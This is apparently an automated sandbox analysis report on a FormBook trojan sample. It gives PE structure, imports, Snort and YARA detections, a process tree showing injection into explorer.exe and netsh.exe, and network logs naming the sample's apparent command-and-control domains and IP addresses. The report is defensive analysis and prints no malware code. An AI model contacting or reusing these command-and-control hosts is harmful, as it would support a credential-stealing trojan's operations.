                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x10000x5c4a0x5e00False0.659906914893617data6.410763775060762IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rdata0x70000x115e0x1200False0.4466145833333333data5.142548180775325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .data0x90000x1b0780x600False0.455078125data4.2252195571372315IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                            .rsrc0x2d0000x9e00xa00False0.45625data4.509328731926377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_ICON0x2d1900x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 640EnglishUnited States
                                            RT_DIALOG0x2d4780x100dataEnglishUnited States
                                            RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                            RT_DIALOG0x2d6980x60dataEnglishUnited States
                                            RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                            RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines (716), with no line terminatorsEnglishUnited States

                                            Imports

                                            DLLImport
                                            KERNEL32.dllSetFileAttributesA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CompareFileTime, SearchPathA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, CreateDirectoryA, lstrcmpiA, GetTempPathA, GetCommandLineA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, LoadLibraryA, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, WaitForSingleObject, ExitProcess, GetWindowsDirectoryA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, LoadLibraryExA, GetModuleHandleA, MultiByteToWideChar, FreeLibrary
                                            USER32.dllGetWindowRect, EnableMenuItem, GetSystemMenu, ScreenToClient, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, PostQuitMessage, RegisterClassA, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, OpenClipboard, TrackPopupMenu, SendMessageTimeoutA, GetDC, LoadImageA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, SetWindowLongA, EmptyClipboard, SetTimer, CreateDialogParamA, wsprintfA, ShowWindow, SetWindowTextA
                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                            SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                            ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                            COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishUnited States

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            192.168.2.5206.233.197.13549710802031453 11/30/22-01:10:42.253815TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5206.233.197.135
                                            192.168.2.5162.214.129.14949712802031453 11/30/22-01:10:50.366888TCP2031453ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.5162.214.129.149
                                            192.168.2.5206.233.197.13549710802031449 11/30/22-01:10:42.253815TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5206.233.197.135
                                            192.168.2.5162.214.129.14949712802031412 11/30/22-01:10:50.366888TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.5162.214.129.149
                                            192.168.2.5206.233.197.13549710802031412 11/30/22-01:10:42.253815TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971080192.168.2.5206.233.197.135
                                            192.168.2.5162.214.129.14949712802031449 11/30/22-01:10:50.366888TCP2031449ET TROJAN FormBook CnC Checkin (GET)4971280192.168.2.5162.214.129.149

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 30, 2022 01:10:29.024822950 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.147394896 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.149022102 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.149192095 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.271584988 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279675961 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279721975 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279748917 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279777050 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279805899 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279834986 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279865026 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279892921 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279922009 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279942989 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.279959917 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:29.280064106 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.280209064 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.280512094 CET4970780192.168.2.5192.185.217.47
                                            Nov 30, 2022 01:10:29.402862072 CET8049707192.185.217.47192.168.2.5
                                            Nov 30, 2022 01:10:39.706011057 CET4970980192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:39.960129976 CET8049709206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:39.960378885 CET4970980192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:39.960500956 CET4970980192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:40.214560032 CET8049709206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:40.547215939 CET8049709206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:40.547250032 CET8049709206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:40.547370911 CET4970980192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:40.964452982 CET4970980192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:41.980474949 CET4971080192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:42.253413916 CET8049710206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:42.253650904 CET4971080192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:42.253814936 CET4971080192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:42.526724100 CET8049710206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:42.818850040 CET8049710206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:42.818918943 CET8049710206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:42.819215059 CET4971080192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:42.822645903 CET4971080192.168.2.5206.233.197.135
                                            Nov 30, 2022 01:10:43.106801987 CET8049710206.233.197.135192.168.2.5
                                            Nov 30, 2022 01:10:48.010961056 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:48.177367926 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.177628040 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:48.177809000 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:48.344197035 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.344644070 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.344672918 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.344693899 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.344713926 CET8049711162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:48.344789028 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:48.344860077 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:49.184077024 CET4971180192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.200092077 CET4971280192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.366451979 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.366700888 CET4971280192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.366888046 CET4971280192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.533267021 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.533715010 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.533760071 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.533793926 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.533827066 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:50.533952951 CET4971280192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.534199953 CET4971280192.168.2.5162.214.129.149
                                            Nov 30, 2022 01:10:50.700480938 CET8049712162.214.129.149192.168.2.5
                                            Nov 30, 2022 01:10:55.727615118 CET4971380192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:55.949546099 CET8049713155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:55.949732065 CET4971380192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:55.949861050 CET4971380192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:56.171719074 CET8049713155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:56.171799898 CET8049713155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:56.171852112 CET8049713155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:56.171915054 CET4971380192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:56.965632915 CET4971380192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.089121103 CET4971480192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.301402092 CET8049714155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:58.301616907 CET4971480192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.301866055 CET4971480192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.514004946 CET8049714155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:58.514065027 CET8049714155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:58.514106989 CET8049714155.159.61.221192.168.2.5
                                            Nov 30, 2022 01:10:58.514235973 CET4971480192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.514421940 CET4971480192.168.2.5155.159.61.221
                                            Nov 30, 2022 01:10:58.726452112 CET8049714155.159.61.221192.168.2.5

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 30, 2022 01:10:28.856163025 CET6532353192.168.2.58.8.8.8
                                            Nov 30, 2022 01:10:29.011351109 CET53653238.8.8.8192.168.2.5
                                            Nov 30, 2022 01:10:39.525219917 CET6344653192.168.2.58.8.8.8
                                            Nov 30, 2022 01:10:39.704725981 CET53634468.8.8.8192.168.2.5
                                            Nov 30, 2022 01:10:47.853636980 CET5675153192.168.2.58.8.8.8
                                            Nov 30, 2022 01:10:48.007566929 CET53567518.8.8.8192.168.2.5
                                            Nov 30, 2022 01:10:55.547888041 CET5503953192.168.2.58.8.8.8
                                            Nov 30, 2022 01:10:55.726146936 CET53550398.8.8.8192.168.2.5
                                            Nov 30, 2022 01:11:03.553632021 CET5922053192.168.2.58.8.8.8
                                            Nov 30, 2022 01:11:04.318644047 CET53592208.8.8.8192.168.2.5
                                            Nov 30, 2022 01:11:05.325809002 CET5668253192.168.2.58.8.8.8
                                            Nov 30, 2022 01:11:06.344841003 CET5668253192.168.2.58.8.8.8
                                            Nov 30, 2022 01:11:06.350476027 CET53566828.8.8.8192.168.2.5
                                            Nov 30, 2022 01:11:07.118748903 CET53566828.8.8.8192.168.2.5

                                            ICMP Packets

                                            TimestampSource IPDest IPChecksumCodeType
                                            Nov 30, 2022 01:11:07.119535923 CET192.168.2.58.8.8.8cff9(Port unreachable)Destination Unreachable

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Nov 30, 2022 01:10:28.856163025 CET192.168.2.58.8.8.80xdc74Standard query (0)www.eufidelizo.comA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:39.525219917 CET192.168.2.58.8.8.80xccc6Standard query (0)www.lyonfinancialusa.comA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:47.853636980 CET192.168.2.58.8.8.80x22daStandard query (0)www.afterdarksocial.clubA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:55.547888041 CET192.168.2.58.8.8.80x18f9Standard query (0)www.patrickguarte.comA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:03.553632021 CET192.168.2.58.8.8.80x4db1Standard query (0)www.19t221013d.tokyoA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:05.325809002 CET192.168.2.58.8.8.80xf47dStandard query (0)www.19t221013d.tokyoA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:06.344841003 CET192.168.2.58.8.8.80xf47dStandard query (0)www.19t221013d.tokyoA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Nov 30, 2022 01:10:29.011351109 CET8.8.8.8192.168.2.50xdc74No error (0)www.eufidelizo.comeufidelizo.comCNAME (Canonical name)IN (0x0001)false
                                            Nov 30, 2022 01:10:29.011351109 CET8.8.8.8192.168.2.50xdc74No error (0)eufidelizo.com192.185.217.47A (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:39.704725981 CET8.8.8.8192.168.2.50xccc6No error (0)www.lyonfinancialusa.com206.233.197.135A (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:48.007566929 CET8.8.8.8192.168.2.50x22daNo error (0)www.afterdarksocial.club162.214.129.149A (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:10:55.726146936 CET8.8.8.8192.168.2.50x18f9No error (0)www.patrickguarte.com155.159.61.221A (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:04.318644047 CET8.8.8.8192.168.2.50x4db1Server failure (2)www.19t221013d.tokyononenoneA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:06.350476027 CET8.8.8.8192.168.2.50xf47dServer failure (2)www.19t221013d.tokyononenoneA (IP address)IN (0x0001)false
                                            Nov 30, 2022 01:11:07.118748903 CET8.8.8.8192.168.2.50xf47dServer failure (2)www.19t221013d.tokyononenoneA (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • www.eufidelizo.com
                                            • www.lyonfinancialusa.com
                                            • www.afterdarksocial.club
                                            • www.patrickguarte.com

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:01:09:00
                                            Start date:30/11/2022
                                            Path:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\Desktop\qHpeBvr9cR.exe
                                            Imagebase:0x400000
                                            File size:285325 bytes
                                            MD5 hash:F5BEA76FFAC05AFBE19274595801184E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low

                                            General

                                            Target ID:1
                                            Start time:01:09:00
                                            Start date:30/11/2022
                                            Path:C:\Users\user\AppData\Local\Temp\febcldoukq.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
                                            Imagebase:0xb10000
                                            File size:147968 bytes
                                            MD5 hash:96E050F99502FE7C52FD9B0F10202578
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 20%, ReversingLabs
                                            Reputation:low

                                            General

                                            Target ID:2
                                            Start time:01:09:00
                                            Start date:30/11/2022
                                            Path:C:\Users\user\AppData\Local\Temp\febcldoukq.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\febcldoukq.exe" C:\Users\user\AppData\Local\Temp\uebzn.cef
                                            Imagebase:0xb10000
                                            File size:147968 bytes
                                            MD5 hash:96E050F99502FE7C52FD9B0F10202578
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.395778723.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.393576373.0000000000B80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.393032745.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Target ID:3
                                            Start time:01:09:06
                                            Start date:30/11/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff69bc80000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.369567476.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.347863799.000000000E3B5000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Target ID:4
                                            Start time:01:09:38
                                            Start date:30/11/2022
                                            Path:C:\Windows\SysWOW64\autochk.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\SysWOW64\autochk.exe
                                            Imagebase:0xbd0000
                                            File size:871424 bytes
                                            MD5 hash:34236DB574405291498BCD13D20C42EB
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Target ID:5
                                            Start time:01:09:44
                                            Start date:30/11/2022
                                            Path:C:\Windows\SysWOW64\netsh.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\netsh.exe
                                            Imagebase:0x1280000
                                            File size:82944 bytes
                                            MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.555011698.00000000007D0000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.561579336.0000000001100000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.559931003.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Disassembly

                                            No disassembly